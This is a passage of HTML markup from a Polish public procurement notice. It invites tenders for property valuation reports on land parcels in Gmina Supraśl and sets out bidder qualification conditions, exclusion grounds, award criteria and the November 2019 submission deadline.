użytkowania wieczystego w prawo własności nieruchomości, oznaczonych jako działki nr: OBRĘB OGRODNICZKI, GMINA SUPRAŚL:1.	948/44 o powierzchni 0,1270 ha,2.	948/41 o powierzchni 0,1565 ha,3.	948/43 o powierzchni 0,0852 ha,4.	948/48 o powierzchni 0,2092 ha,5.	948/31 o powierzchni 0,2168 ha,6.	948/37 o powierzchni 0,0780 ha,7.	948/47 o powierzchni 0,2982 ha,8.	948/33 o powierzchni 0,0740 ha,9.	948/34 o powierzchni 0,0283 ha,10.	948/36 o powierzchni 0,1298 ha,11.	948/28 o powierzchni 0,1016 ha,12.	948/40 o powierzchni 0,1381 ha,13.	948/42 o powierzchni 0,0751 ha,14.	948/32 o powierzchni 0,0066 ha,15.	948/35 o powierzchni 0,2921 ha,16.	948/11 o powierzchni 0,5586 ha,17.	948/20 o powierzchni 0,3002 ha,18.	948/21 o powierzchni 0,3002 ha,19.	948/26 o powierzchni 1,8080 ha,20.	948/39 o powierzchni 0,1090 ha,21.	948/46 o powierzchni 3,6577 ha,22.	948/45 o powierzchni 0,0636 ha,23.	948/29 o powierzchni 0,0640 ha.Przedmiot zamówienia musi posiadać co najmniej dwuletnią gwarancję dla każdej z części.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71319000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia w tym zakresie żadnych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia w tym zakresie żadnych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni ten warunek, jeżeli wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie wykonał min.:•	1 zamówienie – umowę, dotyczące wyceny gruntów przejętych pod drogi w trybie art. 98 ustawy o gospodarce nieruchomościami bądź specustawy drogowej. Wycena winna być wykonana na zamówienie organów administracji publicznej w związku z prowadzonymi przez nie postępowaniami administracyjnymi – dotyczy części A•	po 1 zamówieniu – umowie do każdej z części B, C oraz D (w przypadku składnia oferty jednocześnie na część B, C o raz część D należy wykazać się 3 wykonanymi zamówieniami), dotyczącymi wyceny gruntów przejętych pod drogi publiczne; wyceny te winny być wykonane na zamówienie organów administracji publicznej i w związku z prowadzonymi przez nie postępowaniami w trybie przepisów ustawy z dnia z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych;•	1 zamówienie – umowe, dotyczące wyceny gruntów związku z przekształceniem prawa użytkowania wieczystego w prawo własności. Wycena winna być wykonana na zamówienie organów administracji publicznej w związku z prowadzonymi przez nie postępowaniami administracyjnymi – dotyczy części E;•	UWAGA ! Jedną umowę należy traktować jako jedno zamówienie;•	oraz Wykonawca wykaże się dysponowaniem osobami zdolnymi do wykonania zamówienia – Wykonawca spełni ten warunek, jeżeli wyznaczone przez niego osoby do realizacji powyższego zamówienia posiadają niezbędne uprawnienia do wykonywania szacowania nieruchomości. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Zamawiający informuje, iż dokumentem potwierdzającym spełnianie warunków udziału w postępowaniu w zakresie nie podlegania wykluczeniu z postępowania (na podstawie art. 24 ust. 5 pkt 1 ustawy) jest odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, który Zamawiający uzyska za pomocą bezpłatnych i ogólnodostępnych baz danych. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Przed udzieleniem zamówienia Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy tj. określonych poniżej. Potwierdzających spełnianie warunków uczestnictwa opisanych w punkcie V SIWZ: - wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane wraz z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie tych dokumentów – oświadczenie wykonawcy;- wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami;oraz dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu z postępowania; - odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy (Zamawiający uzyska za pomocą bezpłatnych i ogólnodostępnych baz danych);</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Do oferty wykonawca załącza pisemne zobowiązanie podmiotu trzeciego albo inny dokument, służący wykazaniu udostępnienia wykonawcy potencjału przez podmiot trzeci w zakresie określonym w art. 22a ust. 1 ustawy Pzp. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena ofertowa brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-11-05</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">PL</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>część A</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości w podziale na następujące części:Część AWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), niezbędnych w prowadzonych postępowaniach administracyjnych, dotyczących:nieruchomości gruntowych wydzielonych pod drogi publiczne w trybie przepisów art. 98 ustawy z dnia 21 sierpnia 1997 roku o gospodarce nieruchomościami na podstawie:1.	Decyzja Burmistrza Supraśla z dnia 15 grudnia 2015 roku RGGN.6831.49.2015 obręb Grabówka gm. Supraśl działka o nr 297/4 o pow. 0.0992 ha, działa nr 297/11 o pow. 0.1029 ha, działka nr 297/14 o pow. 1529 ha; Księga wieczysta nr BI1B/00029964/2, sygn. akt 